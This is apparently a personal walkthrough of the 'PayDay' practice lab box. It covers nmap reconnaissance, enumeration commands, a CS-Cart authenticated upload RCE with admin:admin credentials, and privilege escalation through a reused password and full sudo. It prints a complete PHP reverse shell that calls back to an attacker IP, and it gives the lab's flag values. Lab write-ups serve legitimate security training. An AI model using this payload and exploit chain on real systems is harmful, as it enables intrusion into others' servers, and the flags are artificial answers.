PayDay_flow
Recon
TCP Scan
nmap -sCV -oN scans/tcp.nmap $IP
nmap -sCV -oN scans/tcp.nmap $IP
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 14:26 +0800
Nmap scan report for 192.168.142.39
Host is up (0.049s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: STLS PIPELINING TOP UIDL RESP-CODES SASL CAPA
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LOGINDISABLEDA0001 OK SASL-IR Capability completed IMAP4rev1 STARTTLS LITERAL+ THREAD=REFERENCES SORT UNSELECT CHILDREN LOGIN-REFERRALS NAMESPACE MULTIAPPEND
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: IDLE OK SASL-IR Capability completed IMAP4rev1 AUTH=PLAINA0001 LITERAL+ THREAD=REFERENCES SORT UNSELECT CHILDREN LOGIN-REFERRALS NAMESPACE MULTIAPPEND
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
995/tcp open ssl/pop3 Dovecot pop3d
|_ssl-date: 2026-06-23T06:27:18+00:00; +6s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_pop3-capabilities: PIPELINING USER TOP UIDL RESP-CODES SASL(PLAIN) CAPA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: payday
| NetBIOS computer name:
| Domain name:
| FQDN: payday
|_ System time: 2026-06-23T02:27:13-04:00
|_clock-skew: mean: 40m06s, deviation: 1h37m59s, median: 5s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds
UDP Scan (Top 20)
sudo nmap -sU --top-ports 20 -oN scans/udp.nmap $IP
sudo nmap -sU --top-ports 20 -oN scans/udp.nmap $IP
[sudo] password for hans:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-23 14:26 +0800
Nmap scan report for 192.168.142.39
Host is up (0.0083s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
Service Enumeration
Web
Main Page
Register Account
http://192.168.142.39/index.php?target=profiles&mode=add


ExploitDB
https://www.exploit-db.com/exploits/48891
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c
1. Visit "cs-cart" /admin.php and login (Remember: You need to login on **ADMIN** section not on the regular **USER** section).
2. Under **Look and Feel** section click on "**template editor**".
3. And under that section, upload your malicious **.php** file, make sure you rename it to **.phtml** before you upload.
4. If successful, you should be able to get a **RCE**.
5. For example, grab this file -> [https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php](https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php) and rename it to whoami.phtml
6. Now, visit http://[victim]/skins/whoami.phtml
7. And you should see '**www-data**' or '**apache**' etc as the output.
Managed to login using admin:admin on http://192.168.142.39/admin.php
KIV
POP3/IMAP
Directory brute force
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o scans/ferox.md
Virtual host brute force
ffuf -u http://$IP -H "Host: FUZZ.domain" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -o scans/ffuf.html -of html
SMB
List available shares via null session
smbclient -L //$IP -N | tee scans/smbclient.md
Null session enum: users, groups, shares, password policy
nullinux $IP | tee scans/nullinux.md
Deep SMB enum - old Samba
enum4linux -a $IP | tee scans/enum4linux.md
Deep SMB enum - newer Samba
enum4linux-ng $IP | tee scans/enum4linux-ng.md
SMTP
User enumeration via VRFY/EXPN
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t $IP | tee scans/smtp-user-enum.md
SNMP
Community string enum - leaks processes, users, installed software
snmpbulkwalk -v2c -c public $IP | tee scans/snmp.md
for v1
snmpwalk -v1 -c public $IP | tee scans/snmpv1.txt
Others
Foothold
CS-Cart Exploit
https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c
1. Visit "cs-cart" /admin.php and login (Remember: You need to login on **ADMIN** section not on the regular **USER** section).
2. Under **Look and Feel** section click on "**template editor**".
3. And under that section, upload your malicious **.php** file, make sure you rename it to **.phtml** before you upload.
4. If successful, you should be able to get a **RCE**.
5. For example, grab this file -> [https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php](https://raw.githubusercontent.com/F-Masood/php-backdoors/main/whoami.php) and rename it to whoami.phtml
6. Now, visit http://[victim]/skins/whoami.phtml
7. And you should see '**www-data**' or '**apache**' etc as the output.

PHP Reverse Shell
Create a shell.phtml with a PHP reverse shell:
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.232';
$port = 1234;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Upload shell.phtml


Shell
Start Listener and navigate to http://192.168.142.39/skins/shell.phtml:

Stabilise Shell:
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
sh: python3: not found
$ ^[s: not found
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@payday:/$ ^Z
zsh: suspended nc -lvnp 1234
┌──(hans㉿KaliKatak)-[~/…/Hax/Practice/PGPractice/PayDay]
└─$ stty raw -echo; fg
[1] + continued nc -lvnp 1234
www-data@payday:/$ export TERM=xterm
www-data@payday:/$
user flag

www-data@payday:/var/www$ cd /home
www-data@payday:/home$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Apr 12 2016 .
drwxr-xr-x 21 root root 4096 Apr 24 2008 ..
drwxr-xr-x 2 patrick patrick 4096 Mar 25 2020 patrick
www-data@payday:/home$ cd patrick/
www-data@payday:/home/patrick$ ls -al
total 24
drwxr-xr-x 2 patrick patrick 4096 Mar 25 2020 .
drwxr-xr-x 3 root root 4096 Apr 12 2016 ..
-rw------- 1 patrick patrick 0 Mar 25 2020 .bash_history
-rw-r--r-- 1 patrick patrick 220 Apr 24 2008 .bash_logout
-rw-r--r-- 1 patrick patrick 2298 Apr 24 2008 .bashrc
-rw-r--r-- 1 patrick patrick 566 Apr 24 2008 .profile
-rw-r--r-- 1 patrick patrick 33 Jun 23 02:26 local.txt
www-data@payday:/home/patrick$ whoami && hostname && cat local.txt
www-data
payday
6d57350eea4841d35815135548589837
Privilege Escalation
Low-Hanging Fruits
Linux
www-data@payday:/home/patrick$ ls -al /etc/cron.*
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Apr 24 2008 .
drwxr-xr-x 70 root root 4096 Aug 20 2025 ..
-rw-r--r-- 1 root root 102 Dec 20 2006 .placeholder
-rw-r--r-- 1 root root 456 Oct 4 2007 php5
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Apr 24 2008 .
drwxr-xr-x 70 root root 4096 Aug 20 2025 ..
-rw-r--r-- 1 root root 102 Dec 20 2006 .placeholder
-rwxr-xr-x 1 root root 633 Oct 4 2007 apache2
-rwxr-xr-x 1 root root 5811 Oct 15 2007 apt
-rwxr-xr-x 1 root root 314 Sep 15 2007 aptitude
-rwxr-xr-x 1 root root 502 May 15 2007 bsdmainutils
-rwxr-xr-x 1 root root 473 Oct 3 2007 find
-rwxr-xr-x 1 root root 89 Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 946 May 23 2007 man-db
-rwxr-xr-x 1 root root 383 Oct 4 2007 samba
-rwxr-xr-x 1 root root 3283 Dec 20 2006 standard
-rwxr-xr-x 1 root root 1309 Sep 17 2007 sysklogd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 24 2008 .
drwxr-xr-x 70 root root 4096 Aug 20 2025 ..
-rw-r--r-- 1 root root 102 Dec 20 2006 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Apr 24 2008 .
drwxr-xr-x 70 root root 4096 Aug 20 2025 ..
-rw-r--r-- 1 root root 102 Dec 20 2006 .placeholder
-rwxr-xr-x 1 root root 129 Dec 20 2006 standard
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Apr 24 2008 .
drwxr-xr-x 70 root root 4096 Aug 20 2025 ..
-rw-r--r-- 1 root root 102 Dec 20 2006 .placeholder
-rwxr-xr-x 1 root root 520 May 23 2007 man-db
-rwxr-xr-x 1 root root 1942 May 15 2007 popularity-contest
-rwxr-xr-x 1 root root 1220 Sep 17 2007 sysklogd
www-data@payday:/home/patrick$ find / -perm -4000 -type f 2>/dev/null
/lib/dhcp3-client/call-dhclient-script
/sbin/umount.cifs
/sbin/mount.cifs
/bin/fusermount
/bin/ping
/bin/ping6
/bin/check-foreground-console
/bin/umount
/bin/su
/bin/mount
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/mtr
/usr/bin/arping
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/smbmnt
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/smbumount
www-data@payday:/home/patrick$ /sbin/ss -tlnp
Recv-Q Send-Q Local Address:Port Peer Address:Port
0 0 *:993 *:*
0 0 *:995 *:*
0 0 127.0.0.1:3306 *:*
0 0 *:139 *:*
0 0 *:110 *:*
0 0 *:143 *:*
0 0 :::80 :::* users:(("sh",5575,3),("sh",5579,3),("python",5580,3),("bash",5581,3),("ss",5613,3))
0 0 :::22 :::*
0 0 *:445 *:*
MySQL/MariaDB possibly listening on port 3306.
www-data@payday:/home/patrick$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
patrick
User patrick's password is patrick.
ww-data@payday:/home/patrick$ su patrick
Password:
patrick@payday:~$
And patrick can sudo ALL.
patrick@payday:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL
root flag

patrick@payday:~$ sudo su -
root@payday:~# whoami && hostname && cat /root/proof.txt
root
payday
5c5265a432a52c7ccdf2035612c3487b
